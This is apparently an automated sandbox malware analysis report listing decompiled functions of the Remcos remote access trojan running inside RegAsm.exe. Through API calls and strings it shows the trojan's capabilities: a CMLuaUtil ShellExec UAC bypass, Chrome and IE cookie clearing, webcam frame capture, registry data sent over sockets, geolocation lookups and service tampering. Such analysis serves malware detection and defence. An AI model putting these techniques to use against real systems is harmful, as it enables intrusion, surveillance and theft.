                                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                • _free.LIBCMT ref: 00444E87
                                                                • _free.LIBCMT ref: 00444E9E
                                                                • _free.LIBCMT ref: 00444EBD
                                                                • _free.LIBCMT ref: 00444ED8
                                                                • _free.LIBCMT ref: 00444EEF
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$AllocateHeap
                                                                • String ID: KED
                                                                • API String ID: 3033488037-2133951994
                                                                • Opcode ID: 608df991a786fcfe36087b9db06c0af1d3846aff496c4c9c780995c6b43937c3
                                                                • Instruction ID: 6eb5fd97c930506827bd935ec23fdf2bd7e2f8155051dcdfd38a61b70e77380a
                                                                • Opcode Fuzzy Hash: 608df991a786fcfe36087b9db06c0af1d3846aff496c4c9c780995c6b43937c3
                                                                • Instruction Fuzzy Hash: 2351B371A00604ABEB20DF29CC42B6B77F4FF89724B25456EE809D7751E739E901CB98
                                                                Function 00413A90 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 179registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413B26
                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413BC6
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Enum$InfoQueryValue
                                                                • String ID: [regsplt]$xUG$TG
                                                                • API String ID: 3554306468-1165877943
                                                                • Opcode ID: 4010ce4c5e7b861f3456ebae9656c6ef2fa6e35e8f0dda585fb92aeaae03829d
                                                                • Instruction ID: 25111a67c66830bda9a991cbd11294aa9b1843c944dfd5f4caafe5fa1545c2ae
                                                                • Opcode Fuzzy Hash: 4010ce4c5e7b861f3456ebae9656c6ef2fa6e35e8f0dda585fb92aeaae03829d
                                                                • Instruction Fuzzy Hash: 05512D71900219AADB11EB95DC86EEEB77DAF04305F10007AE505B6191EF746B48CBA9
                                                                Function 0044B43C Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0044BBB1,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B47E
                                                                • __fassign.LIBCMT ref: 0044B4F9
                                                                • __fassign.LIBCMT ref: 0044B514
                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B53A
                                                                • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BBB1,00000000,?,?,?,?,?,?,?,?,?,0044BBB1,?), ref: 0044B559
                                                                • WriteFile.KERNEL32(?,?,00000001,0044BBB1,00000000,?,?,?,?,?,?,?,?,?,0044BBB1,?), ref: 0044B592
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                • String ID:
                                                                • API String ID: 1324828854-0
                                                                • Opcode ID: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                                • Instruction ID: 262f0c9efa3d8d05c94b564727faad167cb6e35c827a04fe4b8fb241bd644287
                                                                • Opcode Fuzzy Hash: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                                • Instruction Fuzzy Hash: 2151B470A00249AFDB10CFA8D845AEEFBF8EF09304F14456BE955E7291E734D941CBA9
                                                                Function 00413D48 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 135registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00413D81
                                                                  • Part of subcall function 00413A90: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                                  • Part of subcall function 00413A90: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413B26
                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                • RegCloseKey.ADVAPI32(00000000,004660B4,004660B4,00466478,00466478,00000071), ref: 00413EEF
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseEnumInfoOpenQuerysend
                                                                • String ID: xUG$NG$NG$TG
                                                                • API String ID: 3114080316-2811732169
                                                                • Opcode ID: 3e12fc3dd25856b9ecab2061d3a0a4691b4eaef5d102c7165cd28defd3cf10c6
                                                                • Instruction ID: 39136fa66a1b3d14a29046baa0c8a2124f92290552efa608aac098e6c3039c27
                                                                • Opcode Fuzzy Hash: 3e12fc3dd25856b9ecab2061d3a0a4691b4eaef5d102c7165cd28defd3cf10c6
                                                                • Instruction Fuzzy Hash: 03419F316042005AC324F726D852AEF76A99FD1384F40883FF549671D2EF7C5949866E
                                                                Function 0041B71B Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 91COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00413656: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,004750E4), ref: 00413678
                                                                  • Part of subcall function 00413656: RegQueryValueExW.ADVAPI32(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
                                                                  • Part of subcall function 00413656: RegCloseKey.ADVAPI32(?), ref: 004136A0
                                                                  • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                • _wcslen.LIBCMT ref: 0041B7F4
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                                • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                                                • API String ID: 37874593-122982132
                                                                • Opcode ID: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                                                                • Instruction ID: 00334f857bbe6022557327a28fa8f115e820bd32ca6b34e50ab8c41aa79dd428
                                                                • Opcode Fuzzy Hash: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                                                                • Instruction Fuzzy Hash: 42218872A001046BDB14BAB59CD6AFE766D9B48728F10043FF505B72C3EE3C9D49426D
                                                                Function 0040BF24 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 87COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                  • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00413622
                                                                  • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                                                • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BFA6
                                                                • PathFileExistsA.SHLWAPI(?), ref: 0040BFB3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                • API String ID: 1133728706-4073444585
                                                                • Opcode ID: 7c352b3585a634410ab9138d6cff2a21f89007fdd3bec834ca7dbc2ca3cb0abe
                                                                • Instruction ID: a06d8339010b4a31413dea3cf8b7af81beee50618fccc2c871009a62ab4f9f33
                                                                • Opcode Fuzzy Hash: 7c352b3585a634410ab9138d6cff2a21f89007fdd3bec834ca7dbc2ca3cb0abe
                                                                • Instruction Fuzzy Hash: BC215230A40219A6CB14F7F1CC969EE77299F50744F80017FE502B71D1EB7D6945C6DA
                                                                Function 00456BD3 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f00b1ad24c7174d2716471ab0982682010261559510d9071992da7a4292711ea
                                                                • Instruction ID: d4e598e7927038c57750db0ba161657e9615562456f8c919f0676739ef068bdb
                                                                • Opcode Fuzzy Hash: f00b1ad24c7174d2716471ab0982682010261559510d9071992da7a4292711ea
                                                                • Instruction Fuzzy Hash: 931127B2504214BBEB216F768C05D1F7A5CEB86726B52062EFD55C7292DA3CCC0186A8
                                                                Function 0041B411 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B438
                                                                • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B44E
                                                                • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B467
                                                                • InternetCloseHandle.WININET(00000000), ref: 0041B4AD
                                                                • InternetCloseHandle.WININET(00000000), ref: 0041B4B0
                                                                Strings
                                                                • http://geoplugin.net/json.gp, xrefs: 0041B448
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Internet$CloseHandleOpen$FileRead
                                                                • String ID: http://geoplugin.net/json.gp
                                                                • API String ID: 3121278467-91888290
                                                                • Opcode ID: 9768f0b08c90a41eda23d1866a8ae5095f1886f629a7c574ec4f9b2402cf94c4
                                                                • Instruction ID: e320c318363c88f1c040182635621d8729538b68a2f0080144892bf513bd3cc2
                                                                • Opcode Fuzzy Hash: 9768f0b08c90a41eda23d1866a8ae5095f1886f629a7c574ec4f9b2402cf94c4
                                                                • Instruction Fuzzy Hash: 011198311053126BD224AB269C49EBF7F9CEF86765F10043EF945A2282DB689C44C6FA
                                                                Function 00450F7A Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00450CC1: _free.LIBCMT ref: 00450CEA
                                                                • _free.LIBCMT ref: 00450FC8
                                                                  • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                • _free.LIBCMT ref: 00450FD3
                                                                • _free.LIBCMT ref: 00450FDE
                                                                • _free.LIBCMT ref: 00451032
                                                                • _free.LIBCMT ref: 0045103D
                                                                • _free.LIBCMT ref: 00451048
                                                                • _free.LIBCMT ref: 00451053
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                • Instruction ID: 345e916fd15b447c36d88a7a8914fd19e4c3e0710e9d23c2e9f19f8556552687
                                                                • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                • Instruction Fuzzy Hash: C111D231402704AAE621BB72CC03FCB779CAF03304F454D2EBEA967153C7ACB4185654
                                                                Function 0041119E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 004111AB
                                                                • int.LIBCPMT ref: 004111BE
                                                                  • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                                  • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                                • std::_Facet_Register.LIBCPMT ref: 004111FE
                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00411207
                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00411225
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                • String ID: (mG
                                                                • API String ID: 2536120697-4059303827
                                                                • Opcode ID: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                                                                • Instruction ID: b4facbf35e110c19f3eede998f69f9310dce987b63f856d60fe44c7d5fb17b17
                                                                • Opcode Fuzzy Hash: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                                                                • Instruction Fuzzy Hash: 42112732900114A7CB14EB9AD8018DEB7699F44364F11456FF904F72E1DB789E45CBC8
                                                                Function 0043A3DA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • GetLastError.KERNEL32(?,?,0043A3D1,0043933E), ref: 0043A3E8
                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A3F6
                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40F
                                                                • SetLastError.KERNEL32(00000000,?,0043A3D1,0043933E), ref: 0043A461
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLastValue___vcrt_
                                                                • String ID:
                                                                • API String ID: 3852720340-0
                                                                • Opcode ID: f8b088146f32705476b05de113eddff258cc1bfa1c523dc592fb57b9cb9462fc
                                                                • Instruction ID: 228fd8bb196f6ae1284969ba5442ea73dc67404c1df350b3d70410c0baad6fb0
                                                                • Opcode Fuzzy Hash: f8b088146f32705476b05de113eddff258cc1bfa1c523dc592fb57b9cb9462fc
                                                                • Instruction Fuzzy Hash: 87019C322483515EA61027797C8A62B2648EB293B9F30523FF518805F1EF984C90910D
                                                                Function 004075EB Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 0040760B
                                                                  • Part of subcall function 00407538: _wcslen.LIBCMT ref: 0040755C
                                                                  • Part of subcall function 00407538: CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                                • CoUninitialize.OLE32 ref: 00407664
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: InitializeObjectUninitialize_wcslen
                                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                • API String ID: 3851391207-1839356972
                                                                • Opcode ID: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                                • Instruction ID: e4e7d1672fbddd81374e29e92f863be8f9bad83f72bb7a306ddb251afa86686e
                                                                • Opcode Fuzzy Hash: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                                • Instruction Fuzzy Hash: 4501D272B087116BE2246B65DC4AF6B3748DB41B25F11053FF901A62C1EAB9FC0146AB
                                                                Function 0040BADC Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BB18
                                                                • GetLastError.KERNEL32 ref: 0040BB22
                                                                Strings
                                                                • UserProfile, xrefs: 0040BAE8
                                                                • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAE3
                                                                • [Chrome Cookies found, cleared!], xrefs: 0040BB48
                                                                • [Chrome Cookies not found], xrefs: 0040BB3C
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: DeleteErrorFileLast
                                                                • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                • API String ID: 2018770650-304995407
                                                                • Opcode ID: 7f227baf29ba8510fc9076d17c15206364f61269e19861644170f4ec6218b3ea
                                                                • Instruction ID: 5dee569c6883bfd73109a670bb68234af0f28e4caad238985ba957b2c74b96e7
                                                                • Opcode Fuzzy Hash: 7f227baf29ba8510fc9076d17c15206364f61269e19861644170f4ec6218b3ea
                                                                • Instruction Fuzzy Hash: 5B01DF71A402055BCA04B7B6CC1B9BE7B24E922704B50017FF502726D6FE3E5D0986CE
                                                                Function 0041CE2C Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 48memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • AllocConsole.KERNEL32(00475338), ref: 0041CE35
                                                                • ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                                • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Console$AllocOutputShowWindow
                                                                • String ID: Remcos v$5.1.1 Pro$CONOUT$
                                                                • API String ID: 2425139147-3820604032
                                                                • Opcode ID: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                                                • Instruction ID: 6efa3de70d430de9448838496adf33c47162c0890a3ad1875f095e209401f165
                                                                • Opcode Fuzzy Hash: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                                                • Instruction Fuzzy Hash: A90144B1A80304BBD610F7F19C8BF9E77AC9B14B05F500527BA04A70D2EB6DD944466E
                                                                Function 0041AE51 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 30sleepCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041AE83
                                                                • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE91
                                                                • Sleep.KERNEL32(00002710), ref: 0041AE98
                                                                • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AEA1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                • String ID: Alarm triggered$`Mw
                                                                • API String ID: 614609389-968373943
                                                                • Opcode ID: 715f6b18c41aa76fa9a4930845716c072d9d24f9be949641e6571375284beb95
                                                                • Instruction ID: 264e31dd7f8ae4a58c3cd97330858728e5483d82e525179ed11d996d756d41c5
                                                                • Opcode Fuzzy Hash: 715f6b18c41aa76fa9a4930845716c072d9d24f9be949641e6571375284beb95
                                                                • Instruction Fuzzy Hash: 3EE0D826A40220779A10337B6D0FD6F3D29CAC3B2570100BFFA05660C2DD540C01C6FB
                                                                Function 0043AB5C Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __allrem.LIBCMT ref: 0043ACE9
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD05
                                                                • __allrem.LIBCMT ref: 0043AD1C
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD3A
                                                                • __allrem.LIBCMT ref: 0043AD51
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD6F
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                • String ID:
                                                                • API String ID: 1992179935-0
                                                                • Opcode ID: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                                • Instruction ID: c7cd181284538591ee8af1586cca3d38175ba7b34bac8e5aa56d350f01832762
                                                                • Opcode Fuzzy Hash: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                                • Instruction Fuzzy Hash: 5F815972A40B05ABE7209F29CC41B6FB3A99F48324F24152FF591D67C1E77CE910875A
                                                                Function 00404371 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 206sleepCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • Sleep.KERNEL32(00000000,0040D29D), ref: 004044C4
                                                                  • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: H_prologSleep
                                                                • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                                                • API String ID: 3469354165-3054508432
                                                                • Opcode ID: c9c8c556a156b08ca1f4ae787fccd75c1cb4fb9dff4f64211de25059e72c3e49
                                                                • Instruction ID: df1e58e957a7578ae16e417911435538e3341edc64810737793f4aa4f8849b6c
                                                                • Opcode Fuzzy Hash: c9c8c556a156b08ca1f4ae787fccd75c1cb4fb9dff4f64211de25059e72c3e49
                                                                • Instruction Fuzzy Hash: A751E171A042106BCA14FB369D0A66E3755ABC4748F00443FFA0A676E2DF7D8E45839E
                                                                Function 00411D39 Relevance: 9.2, APIs: 6, Instructions: 206memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 004117D7: SetLastError.KERNEL32(0000000D,00411D57,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 004117DD
                                                                • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411D72
                                                                • GetNativeSystemInfo.KERNEL32(?,0040D2DD,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411DE0
                                                                • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411E04
                                                                  • Part of subcall function 00411CDE: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CEE
                                                                • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E4B
                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E52
                                                                • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F65
                                                                  • Part of subcall function 004120B2: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,?), ref: 00412122
                                                                  • Part of subcall function 004120B2: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 00412129
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                                • String ID:
                                                                • API String ID: 3950776272-0
                                                                • Opcode ID: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                                                • Instruction ID: da58ab861bd0a84ec3871346ef31e8b8814b9d9500880b3a3e1890ad13292c25
                                                                • Opcode Fuzzy Hash: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                                                • Instruction Fuzzy Hash: F761A270700611ABCB209F66C981BAA7BA5AF44704F14411AFF05877A2D77CE8C2CBD9
                                                                Function 0044597A Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: __cftoe
                                                                • String ID:
                                                                • API String ID: 4189289331-0
                                                                • Opcode ID: 94b9633d951d926261153e35bea3a027a650b668ee6fc08797af1e1f6808f75f
                                                                • Instruction ID: b93b8478136607885b926496a305f1bfb884a7f6acf724e610c81469f19cb9e5
                                                                • Opcode Fuzzy Hash: 94b9633d951d926261153e35bea3a027a650b668ee6fc08797af1e1f6808f75f
                                                                • Instruction Fuzzy Hash: 2551FD72500605ABFF209B598C81EAF77A8EF45334F25421FF915A6293DB3DD900C66D
                                                                Function 0041AD09 Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD19
                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A41F,00000000), ref: 0041AD2D
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD3A
                                                                • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD6F
